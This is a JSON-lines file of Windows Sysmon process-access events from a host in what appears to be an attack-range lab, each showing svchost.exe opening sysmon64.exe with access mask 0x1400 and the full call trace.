{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1539,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1540,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1541,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1542,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1543,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1544,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1545,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1546,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
